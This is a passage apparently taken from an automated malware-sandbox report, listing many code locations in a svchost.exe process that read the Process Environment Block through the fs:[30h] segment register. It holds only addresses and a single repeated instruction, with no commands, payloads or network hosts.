                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]2_2_03104B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]2_2_03102B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]2_2_03028B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]2_2_030DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]2_2_0302CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]2_2_03040BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]2_2_030E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]2_2_03050BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]2_2_03030BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]2_2_030DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]2_2_03038BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]2_2_0305EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]2_2_030BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]2_2_030BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]2_2_0306CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]2_2_0305EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]2_2_03054A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]2_2_0306CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]2_2_03036A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]2_2_03040A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]2_2_0306CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]2_2_030DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]2_2_030ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]2_2_0303EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]2_2_03104A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]2_2_03068A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]2_2_03038AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]2_2_03086AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]2_2_03086ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]2_2_03030AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]2_2_03064AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]2_2_0306AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]2_2_030AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]2_2_030BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]2_2_03028918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]2_2_030B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]2_2_030C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]2_2_030B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104940 mov eax, dword ptr fs:[00000030h]2_2_03104940
